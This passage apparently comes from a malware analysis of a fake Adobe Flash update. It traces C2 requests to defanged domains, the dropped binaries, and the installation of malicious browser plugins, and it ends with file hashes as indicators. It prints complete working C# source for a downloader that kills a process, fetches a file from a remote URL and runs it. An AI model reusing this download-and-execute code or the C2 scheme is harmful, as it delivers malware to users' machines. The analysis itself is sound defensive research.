In the code segment above, we can see the version of this assembly is “8” and in this case the GET request URL sent to the C2 server should look like hxxp://eklentidunyasi.com/extFiles/control8.txt. This mechanism would allow the attacker to deliver different malware depending on the version of FlashGuncelle.exe assembly. This same approach is implemented in all other binaries as well.

The following screenshots provide details about a live debugging session of FlashGuncelle.exe

On the following screen, we can see the initial GET request sent to eklentidunyasi[dot]com, hxxp://eklentidunyasi.com/extFiles/control1.txt

Windows 7 32bit (Honeypot) - Folio-2014-01-10-11-59-35

On the next screen, the urlString value “hxxp://eklentidunyasi.com/extFiles/NewFile0001.txt” is the string received by the C2 server as a response to the GET request sent earlier.

Windows 7 32bit (Honeypot) - Folio-2014-01-10-11-59-59

As shown below the malware then uses the response from the server to request an additional malware file to be downloaded using the response above as GET request “hxxp://eklentidunyasi.com/extFiles/NewFile0001.txt”. The file is stored as “C:\ProgramData\YokExe.exe”.

Windows 7 32bit (Honeypot) - Folio-2014-01-10-11-59-59

Below we can see the location where the actual file is stored.

Windows 7 32bit (Honeypot) - Folio-2014-01-10-12-00-59

Next, FlashGuncelle.exe launches YokExe.exe, as shown below.

Windows 7 32bit (Honeypot) - Folio-2014-01-10-12-02-26

\ProgramData\FlashUpdate.exe

This .NET application is a copy of FlashGuncelle.exe and is intended to ensure that the correct version of the YokExe.exe malware is available to be executed and downloaded if required.

\ProgramData\YokExe.exe (or also titled NewMeTrue1)

This assembly is the mother-ship malware of the rogue Adobe Update malware. It embeds as a resource a set of .NET binaries and drops them to \ProgramData\Sextension folder. These are the files dropped by YokExe.exe:

  • Flash_Plugin.exe
  • Updater.exe
  • Ionic.Zip.dll
  • System.Data.SQLite.dll

Here is a snapshot of the main entry point of YokExe.exe which shows how the embedded files are being dropped to the \ProgramData\Sextension folder.

NewMeTrue1

\ProgramData\SExtension\Flash_Plugin.exe

The malware author decided to encapsulate into this binary the functionality for downloading, installing and loading the malicious Chrome and Firefox plugins.

This malicious application also checks the version needed to run by sending a GET request to agentofex[dot]com domain and kicks off the Updater.exe application if a new version needs to be downloaded. Following screen reveals some of the implementation details around the version check.

Flash_Plugin.exe

Flush_Plugin.exe implements two separate C# classes for installing the malicious Firefox and Chrome plugins.

\ProgramData\SExtension\Updater.exe

This malware binary is the only .NET assembly that is not obfuscated. It is a simple .NET application that searches for a file named FPlay.exe and, if it is not found under ProgramData\SExtension folder, downloads from a Web location that is provided as a command line parameter. The code of this application is very simple, as shown below.

internal class Program
{
    private static void Main(string[] args)
    {
        string path = Environment.GetFolderPath(
                                  Environment.SpecialFolder.CommonApplicationData
                                  ) + @"\SExtension" + @"\FPlay.exe";
        string address = args[0];
        Process[] processesByName = Process.GetProcessesByName("FPlay");
        int index = 0;
        while (true)
        {
            if (index >= processesByName.Length)
            {
                break;
            }
            try
            {
                processesByName[index].Kill();
            }
            catch
            {
            }
            index++;
        }
        WebClient client = new WebClient();
        client.Headers["User-Agent"] = "WebClient For Extensions";
        byte[] buffer = client.DownloadData(address);
        using (FileStream stream = new FileStream(path, FileMode.Create))
        {
            stream.Write(buffer, 0, buffer.Length);
        }
        Process.Start(path);
    }
}

We are happy to provide the full report and other details to AV companies and well-known security researchers.

DISCLAIMER: I don’t speak Turkish and all my findings about the Turkish text found in this malware and all related translations to English are purely based on my own research and Google Translate.

Summary

With this particular sample, the C2 servers—at this writing—are still available and fully working.

The hashes of the files related to this sample are copied below.

==================================================
Filename          : FlashUpdate.exe_
MD5               : 40ae8d901102ee3951c241b394eb94e9
SHA1              : 63a6582aa29e5a36d54695086353a67c500a68f9
CRC32             : f6db777a
SHA-256           : 25f1f571aace143bb1055dcf52f9ce31c29f6c7fbdeb0d8a6c11165ac1fd0f4c
Full Path         : E:\ProgramData\FlashUpdate.exe_
Modified Time     : 10/01/2014 3:52:43 PM
Created Time      : 12/01/2014 8:42:00 AM
File Size         : 150,016
File Version      : 1
Product Version   : 1
Identical         : 
Extension         : exe_
File Attributes   : AR
==================================================

==================================================
Filename          : YokExe.exe_
MD5               : 35904af1a3242557510cdc5ff3f44d99
SHA1              : 76dfb7f32d4ff215041d427aaca38b42b0851cee
CRC32             : 85b498c0
SHA-256           : 1fb5799e99090a80375de80afe214af7aea2322dcdc79e63fee99bd0c98a00f2
Full Path         : E:\ProgramData\YokExe.exe_
Modified Time     : 10/01/2014 3:53:48 PM
Created Time      : 12/01/2014 8:42:00 AM
File Size         : 2,333,184
File Version      : 1.0.0.0
Product Version   : 1.0.0.0
Identical         : 
Extension         : exe_
File Attributes   : AR
==================================================

==================================================
Filename          : Flash_Plugin.exe_
MD5               : 971e15cb12229acb7aadf9af252ce2ac
SHA1              : 74ec5100cfe0ff33afb5a511b7d147a19c46b891
CRC32             : cfbc8d9e
SHA-256           : 9799e0fd4b2a86259d5108d1bc6ab8df5d9dafca080d757dd48aafba5e812601
Full Path         : E:\ProgramData\SExtension\Flash_Plugin.exe_
Modified Time     : 10/01/2014 3:53:52 PM
Created Time      : 12/01/2014 8:42:00 AM
File Size         : 32,256
File Version      : 1.0.0.0
Product Version   : 1.0.0.0
Identical         : 
Extension         : exe_
File Attributes   : AR
==================================================

==================================================
Filename          : Ionic.Zip.dll
MD5               : 6ded8fcbf5f1d9e422b327ca51625e24
SHA1              : 8a1140cebc39f6994eef7e8de4627fb7b72a2dd9
CRC32             : a55b8181
SHA-256           : 3b3e541682e48f3fd2872f85a06278da2f3e7877ee956da89b90d732a1eaa0bd
Full Path         : E:\ProgramData\SExtension\Ionic.Zip.dll
Modified Time     : 10/01/2014 3:53:52 PM
Created Time      : 12/01/2014 8:42:00 AM
File Size         : 462,336
File Version      : 1.9.1.8
Product Version   : 1.9.1.8
Identical         : 
Extension         : dll
File Attributes   : AR
==================================================

==================================================
Filename          : log_635249660382077851.txt
MD5               : efc36d20978c90a0e7433fb74fa3b2b3
SHA1              : d4d504e58a0252ae8b0f34d205c5440169fbaba4
CRC32             : b47f1595
SHA-256           : 63b95fb1cab33806bdd44b0c266887325693a3754aec4a8e3cf998380f60b464
Full Path         : E:\ProgramData\SExtension\log_635249660382077851.txt
Modified Time     : 10/01/2014 3:54:10 PM
Created Time      : 12/01/2014 8:42:00 AM
File Size         : 266
File Version      : 
Product Version   : 
Identical         : 
Extension         : txt
File Attributes   : AR
==================================================

==================================================
Filename          : System.Data.SQLite.dll
MD5               : f68240827d1ed7e643da00d9330f63d9
SHA1              : 3795178deb436eae0fd49b0d1d23f9802f0f0ce0
CRC32             : e5c9577f
SHA-256           : 9e3915fab7095ce6be3581035404747ab01a7a3246866ccfa460a5fe76f81550
Full Path         : E:\ProgramData\SExtension\System.Data.SQLite.dll
Modified Time     : 10/01/2014 3:53:52 PM
Created Time      : 12/01/2014 8:42:01 AM
File Size         : 986,624
File Version      : 1.0.83.0
Product Version   : 1.0.83.0
Identical         : 
Extension         : dll
File Attributes   : AR
==================================================

==================================================
Filename          : Updater.exe_
MD5               : 7dd44e689cc82679cc4872fe181241d0
SHA1              : dcef08501fb4c2e5ec157303944aa1b1582f690c
CRC32             : 45982bb6
SHA-256           : 79a57789fcb37115fb690e9efe99de2329a542dc7d084359dec005c3c9ac453a
Full Path         : E:\ProgramData\SExtension\Updater.exe_
Modified Time     : 10/01/2014 3:53:52 PM
Created Time      : 12/01/2014 8:42:01 AM
File Size         : 6,144
File Version      : 1.0.0.0
Product Version   : 1.0.0.0
Identical         : 
Extension         : exe_
File Attributes   : AR
==================================================

==================================================
Filename          : buflash.xpi
MD5               : 37a4de35280ac95c85a7a14ff45ce322
SHA1              : 552d152d9923a50a853ccb327af718019c98b318
CRC32             : 0f0cefa7
SHA-256           : 99e13d9d60b094096d5d34a7f15d07a94ab7f3553ad6bd07e12c31dd752525c6
Full Path         : E:\ProgramData\SExtension\SExtension\buflash.xpi
Modified Time     : 10/01/2014 3:54:05 PM
Created Time      : 12/01/2014 8:42:01 AM
File Size         : 9,875
File Version      : 
Product Version   : 
Identical         : 
Extension         : xpi
File Attributes   : AR
==================================================

==================================================
Filename          : bune10.zip
MD5               : 576803266e8fce29d021b659d929a8bf
SHA1              : 2615840f3a4a265e8d790793e314bdbde00456d2
CRC32             : 37a43d8d
SHA-256           : e9b1632c22ea874850918a665ffd72e388638557eb73e903ab4d6a29f8c39884
Full Path         : E:\ProgramData\SExtension\SExtension\bune10.zip
Modified Time     : 10/01/2014 3:54:07 PM
Created Time      : 12/01/2014 8:42:01 AM
File Size         : 37,365
File Version      : 
Product Version   : 
Identical         : 
Extension         : zip
File Attributes   : AR
==================================================

==================================================
Filename          : background.js
MD5               : ce540800e3ebc2f246cbdd66eeeacccf
SHA1              : c27db74d28b15d04896974f3f126128c478f92db
CRC32             : a9cb1c8a
SHA-256           : fc54ac80f257c30807b50be768dfb38c123464b916dd839469a99f094e457368
Full Path         : E:\ProgramData\SExtension\SExtension\ext\background.js
Modified Time     : 10/01/2014 5:05:44 AM
Created Time      : 12/01/2014 8:42:01 AM
File Size         : 2,702
File Version      : 
Product Version   : 
Identical         : 
Extension         : js
File Attributes   : AR
==================================================

==================================================
Filename          : extension.js
MD5               : baf958bf8efb09bdaedd46edc200bd2c
SHA1              : f479f885f04c33a467be6d7902b14b736ffe58b7
CRC32             : f82ce877
SHA-256           : fe1c42c2fb21679cdb8dec9ed201bda385f3bc125f7eb63ea1ead49aef7d494d
Full Path         : E:\ProgramData\SExtension\SExtension\ext\extension.js
Modified Time     : 6/01/2014 3:00:18 AM
Created Time      : 12/01/2014 8:42:01 AM
File Size         : 92,546
File Version      : 
Product Version   : 
Identical         : 
Extension         : js
File Attributes   : AR
==================================================

==================================================
Filename          : go.js
MD5               : e6a9d903bb3d18e383ad57a75c76c96f
SHA1              : acc00498f5f132d267c4b2455b3e9033ff3f1123
CRC32             : b6d9c567
SHA-256           : 88ba39cf539229599cc1544f253f0bfd5554b984c162e34595f5fa4e44a1a8e4
Full Path         : E:\ProgramData\SExtension\SExtension\ext\go.js
Modified Time     : 29/12/2013 3:52:34 AM
Created Time      : 12/01/2014 8:42:01 AM
File Size         : 8,994
File Version      : 
Product Version   : 
Identical         : 
Extension         : js
File Attributes   : AR
==================================================

==================================================
Filename          : index.html
MD5               : 95aacd60be37341329a7e9fb9380be0d
SHA1              : 89e3a6f198a2978a75f1dde1c4a5a29e3a9949a7
CRC32             : 5ac53cdb
SHA-256           : 7a3e19067d16d03c18f369ca6239f5ea702d1e79fe7b5ae3a390bbb5afbc3356
Full Path         : E:\ProgramData\SExtension\SExtension\ext\index.html
Modified Time     : 29/12/2013 3:46:38 AM
Created Time      : 12/01/2014 8:42:01 AM
File Size         : 157
File Version      : 
Product Version   : 
Identical         : 
Extension         : html
File Attributes   : AR
==================================================

==================================================
Filename          : manifest.json
MD5               : 11344191ba5f3eed6c1b0d016248e90a
SHA1              : 8d39148233d5115c35bf856080f00b8f123acdf0
CRC32             : c44a9fb1
SHA-256           : bcdb6fb80237b54245943766048bc79ea218a0b06ac585d8ce80ebf34c8b9fbf
Full Path         : E:\ProgramData\SExtension\SExtension\ext\manifest.json
Modified Time     : 30/11/2013 2:43:12 AM
Created Time      : 12/01/2014 8:42:01 AM
File Size         : 665
File Version      : 
Product Version   : 
Identical         : 
Extension         : json
File Attributes   : AR
==================================================